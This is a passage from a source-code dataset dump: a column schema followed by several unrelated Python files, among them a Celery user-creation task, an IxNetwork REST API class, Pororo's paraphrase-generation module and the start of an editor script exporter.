blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
64d3ee1b2b63bf47956a16eb239dd218474a9fad | 1a55572a16c3e34c72630043af7ab3d05bafae8c | /Celery/celery_with_django/mysite/core/tasks.py | 877830411a479b583d31addcbbe10ff041244a19 | [] | no_license | Wald-K/Technologies | 1e2720a05083ba24da3d1761088d0cab4a6e9658 | 8cc2b27fbe5e6c860342fd46b251680899d111bb | refs/heads/master | 2023-01-12T14:11:29.204133 | 2021-01-25T21:54:45 | 2021-01-25T21:54:45 | 196,719,173 | 0 | 0 | null | 2023-01-07T20:03:47 | 2019-07-13T12:28:18 | Python | UTF-8 | Python | false | false | 581 | py | import string
import time
from django.contrib.auth.models import User
from django.utils.crypto import get_random_string
from celery import shared_task
@shared_task
def create_random_user_accounts(total):
for i in range(total):
username = 'user_{}'.format(get_random_string(10, string.ascii_letters))
email = '{}@example.com'.format(username)
password = get_random_string(50)
User.objects.create_user(username=username, email=email, password=password)
time.sleep(10)
return '{} random users created with success'.format(total)
| [
"[email protected]"
] | |
0e8291c913d42d6d47aa129d4403133d044afa4f | ac216a2cc36f91625e440247986ead2cd8cce350 | /go/src/infra/tools/vpython/testdata/test_requests_get.py | f36999bde734744de8ae72fa434816c8ed2cfa45 | [
"BSD-3-Clause"
] | permissive | xinghun61/infra | b77cdc566d9a63c5d97f9e30e8d589982b1678ab | b5d4783f99461438ca9e6a477535617fadab6ba3 | refs/heads/master | 2023-01-12T21:36:49.360274 | 2019-10-01T18:09:22 | 2019-10-01T18:09:22 | 212,168,656 | 2 | 1 | BSD-3-Clause | 2023-01-07T10:18:03 | 2019-10-01T18:22:44 | Python | UTF-8 | Python | false | false | 544 | py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cryptography
import requests
SITE = 'https://www.google.com'
print 'Using requests version:', requests.__version__
print 'Using cryptography version:', cryptography.__version__
print 'Testing requests from:', SITE
r = requests.get(SITE)
print 'Status Code:', r.status_code
if len(r.text) == 0:
print 'Content length is zero!'
else:
print 'Content length is non-zero.'
| [
"[email protected]"
] | |
e0190ff61f2aabbb5624403696f355f6c20c9987 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_unifies.py | 6a571fbebcd0b1f1afa793ee61d08959b4764e46 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
from xai.brain.wordbase.verbs._unify import _UNIFY
#calss header
class _UNIFIES(_UNIFY, ):
def __init__(self,):
_UNIFY.__init__(self)
self.name = "UNIFIES"
self.specie = 'verbs'
self.basic = "unify"
self.jsondata = {}
| [
"[email protected]"
] | |
80c9278d853e0dae42d1405cbe2fdc3c938b0df3 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/dcemulticastmacrange_cc6bbd6d9c9c0e88f6e630afd3a84823.py | 09fd8e288e4cbb7a1e6c8a322287c74d41fefd37 | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,198 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class DceMulticastMacRange(Base):
"""Sets the Multicast MAC Range for the DCE ISIS router.
The DceMulticastMacRange class encapsulates a list of dceMulticastMacRange resources that are managed by the user.
A list of resources can be retrieved from the server using the DceMulticastMacRange.find() method.
The list can be managed by using the DceMulticastMacRange.add() and DceMulticastMacRange.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'dceMulticastMacRange'
_SDM_ATT_MAP = {
'Enabled': 'enabled',
'InterGroupUnicastMacIncrement': 'interGroupUnicastMacIncrement',
'IntraGroupUnicastMacIncrement': 'intraGroupUnicastMacIncrement',
'MulticastMacCount': 'multicastMacCount',
'MulticastMacStep': 'multicastMacStep',
'SourceGroupMapping': 'sourceGroupMapping',
'StartMulticastMac': 'startMulticastMac',
'StartUnicastSourceMac': 'startUnicastSourceMac',
'Topology': 'topology',
'UnicastSourcesPerMulticastMac': 'unicastSourcesPerMulticastMac',
'VlanId': 'vlanId',
}
_SDM_ENUM_MAP = {
'sourceGroupMapping': ['fullyMeshed', 'oneToOne', 'manualMapping'],
}
def __init__(self, parent, list_op=False):
super(DceMulticastMacRange, self).__init__(parent, list_op)
@property
def Enabled(self):
# type: () -> bool
"""
Returns
-------
- bool: If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def InterGroupUnicastMacIncrement(self):
# type: () -> str
"""
Returns
-------
- str: The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
"""
return self._get_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'])
@InterGroupUnicastMacIncrement.setter
def InterGroupUnicastMacIncrement(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['InterGroupUnicastMacIncrement'], value)
@property
def IntraGroupUnicastMacIncrement(self):
# type: () -> str
"""
Returns
-------
- str: The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
"""
return self._get_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'])
@IntraGroupUnicastMacIncrement.setter
def IntraGroupUnicastMacIncrement(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['IntraGroupUnicastMacIncrement'], value)
@property
def MulticastMacCount(self):
# type: () -> int
"""
Returns
-------
- number: The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
"""
return self._get_attribute(self._SDM_ATT_MAP['MulticastMacCount'])
@MulticastMacCount.setter
def MulticastMacCount(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['MulticastMacCount'], value)
@property
def MulticastMacStep(self):
# type: () -> str
"""
Returns
-------
- str: The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
"""
return self._get_attribute(self._SDM_ATT_MAP['MulticastMacStep'])
@MulticastMacStep.setter
def MulticastMacStep(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['MulticastMacStep'], value)
@property
def SourceGroupMapping(self):
# type: () -> str
"""
Returns
-------
- str(fullyMeshed | oneToOne | manualMapping): The Source Group mapping type.
"""
return self._get_attribute(self._SDM_ATT_MAP['SourceGroupMapping'])
@SourceGroupMapping.setter
def SourceGroupMapping(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['SourceGroupMapping'], value)
@property
def StartMulticastMac(self):
# type: () -> str
"""
Returns
-------
- str: The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
"""
return self._get_attribute(self._SDM_ATT_MAP['StartMulticastMac'])
@StartMulticastMac.setter
def StartMulticastMac(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['StartMulticastMac'], value)
@property
def StartUnicastSourceMac(self):
# type: () -> str
"""
Returns
-------
- str: The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
"""
return self._get_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'])
@StartUnicastSourceMac.setter
def StartUnicastSourceMac(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['StartUnicastSourceMac'], value)
@property
def Topology(self):
# type: () -> int
"""
Returns
-------
- number: The topology identifier to which the corresponding MAC belongs.
"""
return self._get_attribute(self._SDM_ATT_MAP['Topology'])
@Topology.setter
def Topology(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Topology'], value)
@property
def UnicastSourcesPerMulticastMac(self):
# type: () -> int
"""
Returns
-------
- number: The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
"""
return self._get_attribute(self._SDM_ATT_MAP['UnicastSourcesPerMulticastMac'])
@UnicastSourcesPerMulticastMac.setter
def UnicastSourcesPerMulticastMac(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['UnicastSourcesPerMulticastMac'], value)
@property
def VlanId(self):
# type: () -> int
"""
Returns
-------
- number: The VLAN ID of the enabled Multicast MAC Range. (default = 1)
"""
return self._get_attribute(self._SDM_ATT_MAP['VlanId'])
@VlanId.setter
def VlanId(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['VlanId'], value)
def update(self, Enabled=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastMacCount=None, MulticastMacStep=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, Topology=None, UnicastSourcesPerMulticastMac=None, VlanId=None):
# type: (bool, str, str, int, str, str, str, str, int, int, int) -> DceMulticastMacRange
"""Updates dceMulticastMacRange resource on the server.
Args
----
- Enabled (bool): If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
- InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
- IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
- MulticastMacCount (number): The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
- MulticastMacStep (str): The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
- SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
- StartMulticastMac (str): The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
- StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
- Topology (number): The topology identifier to which the corresponding MAC belongs.
- UnicastSourcesPerMulticastMac (number): The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
- VlanId (number): The VLAN ID of the enabled Multicast MAC Range. (default = 1)
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, Enabled=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastMacCount=None, MulticastMacStep=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, Topology=None, UnicastSourcesPerMulticastMac=None, VlanId=None):
# type: (bool, str, str, int, str, str, str, str, int, int, int) -> DceMulticastMacRange
"""Adds a new dceMulticastMacRange resource on the server and adds it to the container.
Args
----
- Enabled (bool): If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
- InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
- IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
- MulticastMacCount (number): The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
- MulticastMacStep (str): The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
- SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
- StartMulticastMac (str): The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
- StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
- Topology (number): The topology identifier to which the corresponding MAC belongs.
- UnicastSourcesPerMulticastMac (number): The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
- VlanId (number): The VLAN ID of the enabled Multicast MAC Range. (default = 1)
Returns
-------
- self: This instance with all currently retrieved dceMulticastMacRange resources using find and the newly added dceMulticastMacRange resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained dceMulticastMacRange resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, Enabled=None, InterGroupUnicastMacIncrement=None, IntraGroupUnicastMacIncrement=None, MulticastMacCount=None, MulticastMacStep=None, SourceGroupMapping=None, StartMulticastMac=None, StartUnicastSourceMac=None, Topology=None, UnicastSourcesPerMulticastMac=None, VlanId=None):
# type: (bool, str, str, int, str, str, str, str, int, int, int) -> DceMulticastMacRange
"""Finds and retrieves dceMulticastMacRange resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dceMulticastMacRange resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all dceMulticastMacRange resources from the server.
Args
----
- Enabled (bool): If true, enables the Multicast MAC Range for a particular DCE ISIS route range. (default = false)
- InterGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC between one or more node groups. (Default = 00 00 00 00 00)
- IntraGroupUnicastMacIncrement (str): The MAC address format of the Unicast MAC within a node group. (Default = 00 00 00 00 01)
- MulticastMacCount (number): The number of Multicast MAC addresses. This option takes unsigned integer value ranging from 1 to UINT_MAX.
- MulticastMacStep (str): The incremental value of Multicast MAC address. (Default = 00 00 00 00 01)
- SourceGroupMapping (str(fullyMeshed | oneToOne | manualMapping)): The Source Group mapping type.
- StartMulticastMac (str): The MAC address format of the starting Multicast MAC. (Default = 0x01000000)
- StartUnicastSourceMac (str): The MAC address format of the starting Unicast Source MAC. (Default = 00 00 00 00 00 00)
- Topology (number): The topology identifier to which the corresponding MAC belongs.
- UnicastSourcesPerMulticastMac (number): The number of Unicast Source for each Multicast MAC address. This option takes unsigned integer value ranging from 0 to UINT_MAX.
- VlanId (number): The VLAN ID of the enabled Multicast MAC Range. (default = 1)
Returns
-------
- self: This instance with matching dceMulticastMacRange resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of dceMulticastMacRange data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the dceMulticastMacRange resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| [
"[email protected]"
] | |
5227f9d6b5eb4371104a5de1424d2bec42568366 | 59beef06efb305f1b39e85cfdfb69221241ff9df | /pororo/tasks/paraphrase_generation.py | 2225891c0cd3ddef948906807b8e8bda4a265419 | [
"Apache-2.0",
"BSD-3-Clause",
"HPND",
"MIT",
"ISC",
"Python-2.0",
"Unlicense",
"LicenseRef-scancode-secret-labs-2011",
"BSD-2-Clause"
] | permissive | saimishra/pororo | 747bb506f92b35a9da7e18f43e20d4954db5d985 | 1f61b331d07c22fb9e8ee051a5f6c0c91ae67062 | refs/heads/master | 2023-02-28T09:06:24.492863 | 2021-02-03T08:19:25 | 2021-02-03T08:19:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,253 | py | """Paraphrase Generation modeling class"""
from typing import Optional
from pororo.tasks.utils.base import PororoFactoryBase, PororoGenerationBase
from pororo.tasks.utils.download_utils import download_or_load
class PororoParaphraseFactory(PororoFactoryBase):
"""
paraphrase generation using Transformer Seq2Seq
Multi (`transformer.large.multi.mtpg`)
- dataset: Internal data
- metric: BLEU score
+----------+------------+
| Language | BLEU score |
+==========+============+
| Average | 33.00 |
+----------+------------+
| Englosh | 54 |
+----------+------------+
| Korean | 50 |
+----------+------------+
| Japanese | 20 |
+----------+------------+
| Chinese | 8 |
+----------+------------+
Multi (`transformer.large.multi.fast.mtpg`)
- dataset: Internal data
- metric: BLEU score
+----------+------------+
| Language | BLEU score |
+==========+============+
| Average | 33.50 |
+----------+------------+
| Englosh | 56 |
+----------+------------+
| Korean | 50 |
+----------+------------+
| Japanese | 20 |
+----------+------------+
| Chinese | 8 |
+----------+------------+
Args:
text (str): input sentence to be paraphrase generated
beam (int): beam search size
temperature (float): temperature scale
top_k (int): top-K sampling vocabulary size
top_p (float): top-p sampling ratio
no_repeat_ngram_size (int): no repeat ngram size
len_penalty (float): length penalty ratio
Returns:
str: generated paraphrase
Examples:
>>> pg = Pororo(task="pg", lang="ko")
>>> pg("노는게 제일 좋아. 친구들 모여라. 언제나 즐거워.")
노는 것이 가장 좋습니다. 친구들끼리 모여 주세요. 언제나 즐거운 시간 되세요.
>>> pg = Pororo("pg", lang="zh")
>>> pg("我喜欢足球") # 나는 축구를 좋아해
'我喜欢球球球' # 나는 공을 좋아해
>>> pg = Pororo(task="pg", lang="ja")
>>> pg("雨の日を聞く良い音楽をお勧めしてくれ。") # 비오는 날 듣기 좋은 음악 가르쳐줘
'雨の日を聞くいい音楽を教えてください。' # 비오는 날 듣기 좋은 음악을 가르쳐 주세요
>>> pg = Pororo("pg", lang="en")
>>> pg("There is someone at the door.")
"Someone's at the door."
>>> pg("I'm good, but thanks for the offer.")
"I'm fine, but thanks for the deal."
"""
def __init__(self, task: str, lang: str, model: Optional[str]):
super().__init__(task, lang, model)
@staticmethod
def get_available_langs():
return ["en", "ko", "zh", "ja"]
@staticmethod
def get_available_models():
return {
"en": [
"transformer.large.multi.mtpg",
"transformer.large.multi.fast.mtpg",
"transformer.base.en.pg",
],
"ko": [
"transformer.large.multi.mtpg",
"transformer.large.multi.fast.mtpg",
"transformer.base.ko.pg_long",
"transformer.base.ko.pg",
],
"zh": [
"transformer.large.multi.mtpg",
"transformer.large.multi.fast.mtpg",
"transformer.base.zh.pg",
],
"ja": [
"transformer.large.multi.mtpg",
"transformer.large.multi.fast.mtpg",
"transformer.base.ja.pg",
],
}
def load(self, device: str):
"""
Load user-selected task-specific model
Args:
device (str): device information
Returns:
object: User-selected task-specific model
"""
if "multi" in self.config.n_model:
from fairseq.models.transformer import TransformerModel
from pororo.tasks.utils.tokenizer import CustomTokenizer
load_dict = download_or_load(
f"transformer/{self.config.n_model}",
"multi",
)
model = (TransformerModel.from_pretrained(
model_name_or_path=load_dict.path,
checkpoint_file=f"{self.config.n_model}.pt",
data_name_or_path=load_dict.dict_path,
source_lang=load_dict.src_dict,
target_lang=load_dict.tgt_dict,
).eval().to(device))
tokenizer = CustomTokenizer.from_file(
vocab_filename=f"{load_dict.src_tok}/vocab.json",
merges_filename=f"{load_dict.src_tok}/merges.txt",
)
return PororoTransformerTransMulti(
model,
self.config,
tokenizer,
)
if "transformer" in self.config.n_model:
from fairseq.models.transformer import TransformerModel
load_dict = download_or_load(
f"transformer/{self.config.n_model}",
self.config.lang,
)
tokenizer = None
model = (TransformerModel.from_pretrained(
model_name_or_path=load_dict.path,
checkpoint_file=f"{self.config.n_model}.pt",
data_name_or_path=load_dict.dict_path,
source_lang=load_dict.src_dict,
target_lang=load_dict.tgt_dict,
).eval().to(device))
if self.config.lang != "zh":
from pororo.tasks.utils.tokenizer import CustomTokenizer
tokenizer = CustomTokenizer.from_file(
vocab_filename=f"{load_dict.src_tok}/vocab.json",
merges_filename=f"{load_dict.src_tok}/merges.txt",
)
return PororoTransformerParaphrase(model, self.config, tokenizer)
class PororoTransformerTransMulti(PororoGenerationBase):
def __init__(self, model, config, tokenizer):
super().__init__(config)
self._model = model
self._tokenizer = tokenizer
self._mapping = {"en": "_XX", "ja": "_XX", "ko": "_KR", "zh": "_CN"}
def _langtok(self, lang: str):
"""
Args:
lang (str): language code
See Also:
https://github.com/pytorch/fairseq/blob/master/fairseq/data/multilingual/multilingual_utils.py#L34
"""
return f"[{lang + self._mapping[lang]}]"
def _preprocess(self, text: str) -> str:
"""
Preprocess non-chinese input sentence to replace whitespace token with whitespace
Args:
text (str): non-chinese sentence
Returns:
str: preprocessed non-chinese sentence
"""
if self.config.lang == "en":
pieces = " ".join(self._tokenizer.segment(text.strip()))
else:
pieces = " ".join([c if c != " " else "▁" for c in text.strip()])
return f"{self._langtok(self.config.lang)} {pieces} {self._langtok(self.config.lang)}"
def _postprocess(self, output: str) -> str:
"""
Postprocess output sentence to replace whitespace
Args:
output (str): output sentence generated by model
Returns:
str: postprocessed output sentence
"""
return output.replace(" ", "").replace("▁", " ").strip()
def predict(
self,
text: str,
beam: int = 5,
temperature: float = 1.0,
top_k: int = -1,
top_p: float = -1,
no_repeat_ngram_size: int = 4,
len_penalty: float = 1.0,
) -> str:
"""
Conduct machine translation
Args:
text (str): input sentence to be paraphrase generated
beam (int): beam search size
temperature (float): temperature scale
top_k (int): top-K sampling vocabulary size
top_p (float): top-p sampling ratio
no_repeat_ngram_size (int): no repeat ngram size
len_penalty (float): length penalty ratio
Returns:
str: machine translated sentence
"""
text = self._preprocess(text)
sampling = False
if top_k != -1 or top_p != -1:
sampling = True
output = self._model.translate(
text,
beam=beam,
sampling=sampling,
temperature=temperature,
sampling_topk=top_k,
sampling_topp=top_p,
max_len_a=1,
max_len_b=50,
no_repeat_ngram_size=no_repeat_ngram_size,
lenpen=len_penalty,
)
output = self._postprocess(output)
return output
def __call__(
self,
text: str,
beam: int = 5,
temperature: float = 1.0,
top_k: int = -1,
top_p: float = -1,
no_repeat_ngram_size: int = 4,
len_penalty: float = 1.0,
):
assert isinstance(text, str), "Input text should be string type"
return self.predict(
text,
beam,
temperature,
top_k,
top_p,
no_repeat_ngram_size,
len_penalty,
)
class PororoTransformerParaphrase(PororoGenerationBase):
def __init__(self, model, config, tokenizer):
super().__init__(config)
self._model = model
self._tokenizer = tokenizer
def _preprocess(self, text: str):
"""
Preprocess non-chinese input sentence to replace whitespace token with whitespace
Args:
text (str): non-chinese sentence
Returns:
str: preprocessed non-chinese sentence
"""
pieces = self._tokenizer.segment(text.strip())
return " ".join(pieces)
def _zh_preprocess(self, text: str):
"""
Preprocess chinese input sentence to replace whitespace token with whitespace
Args:
text (str): chinese sentence
Returns:
str: preprocessed chinese sentence
"""
return " ".join(char for char in text)
def _postprocess(self, output: str):
"""
Postprocess output sentence to replace whitespace
Args:
output (str): output sentence generated by model
Returns:
str: postprocessed output sentence
"""
return output.replace(" ", "").replace("▁", " ").strip()
def predict(
self,
text: str,
beam: int = 1,
temperature: float = 1.0,
top_k: int = -1,
top_p: float = -1,
no_repeat_ngram_size: int = 4,
len_penalty: float = 1.0,
):
"""
Conduct paraphrase generation using Transformer Seq2Seq
Args:
text (str): input sentence to be paraphrase generated
beam (int): beam search size
temperature (float): temperature scale
top_k (int): top-K sampling vocabulary size
top_p (float): top-p sampling ratio
no_repeat_ngram_size (int): no repeat ngram size
len_penalty (float): length penalty ratio
Returns:
str: generated paraphrase
"""
sampling = False
if top_k != -1 or top_p != -1:
sampling = True
if self._tokenizer is not None:
text = self._preprocess(text)
else:
text = self._zh_preprocess(text)
output = self._model.translate(
text,
beam=beam,
sampling=sampling,
temperature=temperature,
sampling_topk=top_k,
sampling_topp=top_p,
max_len_a=1,
max_len_b=50,
no_repeat_ngram_size=no_repeat_ngram_size,
lenpen=len_penalty,
)
output = self._postprocess(output)
return output
| [
"[email protected]"
] | |
1b3221ba8ff6401dc3e95db960e66b8d4d2943ec | 17ca4c286c70277c626735bb7959e0fc08a8be1f | /start/editor/ActivityScriptExporter.py | 095c1f94a0c806a8992183245073dbbc2e0a3880 | [] | no_license | huazhicai/kidney | 6edae18eee63a8f71cb6cde3a070526192ecdcf1 | 87ec2bcc5929e641870ec89e08fbe1177748434e | refs/heads/master | 2022-11-10T20:59:42.970794 | 2020-04-29T01:39:09 | 2020-04-29T01:39:09 | 200,326,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,143 | py | # coding: utf-8
import os
import math
import csv
import re
import traceback
"""
NOTE: 预存数据的runTimeData仅支持以下几种类型
1. String -> string
2. Float -> float
3. Int -> int
4. None -> None
5. Vec3 -> (a, b, c) -> math3d.vector
这里使用tuple表示Vec3, 故tuple数据类型被占用
"""
# TODO: 数据校验
# TODO: const function 内敛
# TODO: Vec3
CLIENT_SCRIPT = "client"
SERVER_SCRIPT = "server"
class NoneValueError(Exception):
def __init__(self, message, nodeID, argTypeID):
super(NoneValueError, self).__init__(message)
self.nodeID = nodeID
self.argTypeID = argTypeID
class TypeMismatchError(Exception):
def __init__(self, message, nodeID, argTypeID):
super(TypeMismatchError, self).__init__(message)
self.nodeID = nodeID
self.argTypeID = argTypeID
class Node(object):
def __init__(self):
self.name = None
self.nodeType = None
# self.preQueryNodes = []
self.args = {}
self.returns = {}
self.eventLinks = {}
self.preLinks = {}
self.funcs = {}
self.nodeDef = None
def is_node(self, nodeName, nodeType):
if self.name == nodeName and self.nodeType == nodeType:
assert self.name == nodeName
assert self.nodeType == nodeType
return True
return False
class Value(object):
def __init__(self):
self.idx = None
self.value = None
def num_events_in_args(nodeDef):
count = 0
for arg in nodeDef['args']:
if arg['type'] == 'Event':
count += 1
return count
def string_to_vec3(value):
assert value[:5] == "Vec3("
assert value[-1] == ")"
a, b, c = value[5:-1].split(',')
a = float(a)
b = float(b)
c = float(c)
return (a, b, c)
def extract_multiple_string(value):
# Note: csv.reader需要一个迭代器作为参数,所以这里包装一下
# TODO: 这里转出来不是unicode?
data = next(csv.reader([value], quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True))
return data
def validate_type(value, argType):
if argType == 'Int':
return type(value) == int
elif argType == 'Float':
return type(value) == float
elif argType == 'Bool':
return type(value) == bool
elif argType == 'String':
return type(value) == str
elif argType == 'Vec3':
return type(value) == tuple and len(value) == 3 and type(value[0]) == float and type(
value[1]) == float and type(value[2]) == float
return True
def validate_def_data(defData):
from uuid import UUID
uuidSet = set()
for nodeDef in defData:
for arg in nodeDef['args']:
uuid = arg['name'][1]
try:
assert uuid not in uuidSet
except:
print('Duplicate UUID !!! : ', uuid)
raise
assert UUID(uuid, version=4)
uuidSet.add(uuid)
if 'default' in arg:
try:
value = arg['default']
if arg['type'] == 'Vec3':
value = string_to_vec3(value)
assert validate_type(value, arg['type'])
except:
print('Wrong default value type: ', arg)
raise
for ret in nodeDef['returns']:
uuid = ret['name'][1]
try:
assert uuid not in uuidSet
except:
print('Duplicate UUID !!! : ', uuid)
raise
# assert UUID(uuid, version=4)
uuidSet.add(uuid)
uuid = nodeDef['name'][1]
try:
assert uuid not in uuidSet
except:
print('Duplicate UUID !!! : ', uuid)
raise
# assert UUID(uuid, version=4)
uuidSet.add(uuid)
# NOTE: query类节点不可以使用Event
# NOTE: 类型的首字母必须是大写
for nodeDef in defData:
if nodeDef.get('query', False):
for arg in nodeDef['args']:
assert arg['type'] != 'Event'
assert 65 <= ord(arg['type'][0]) <= 90
for ret in nodeDef['returns']:
assert ret['type'] != 'Event'
assert 65 <= ord(ret['type'][0]) <= 90
# NOTE: 非query节点类,如果定义了event,一定要有对应的func
for nodeDef in defData:
if nodeDef.get('query', False):
continue
for arg in nodeDef['args']:
if arg['type'] != 'Event':
continue
try:
assert 'action' or 'function' in arg
except:
print('Def Error, event does not have func', nodeDef)
raise
def validate_editor_data(editorData):
edgeSet = set()
for editorEdge in editorData["edges"]:
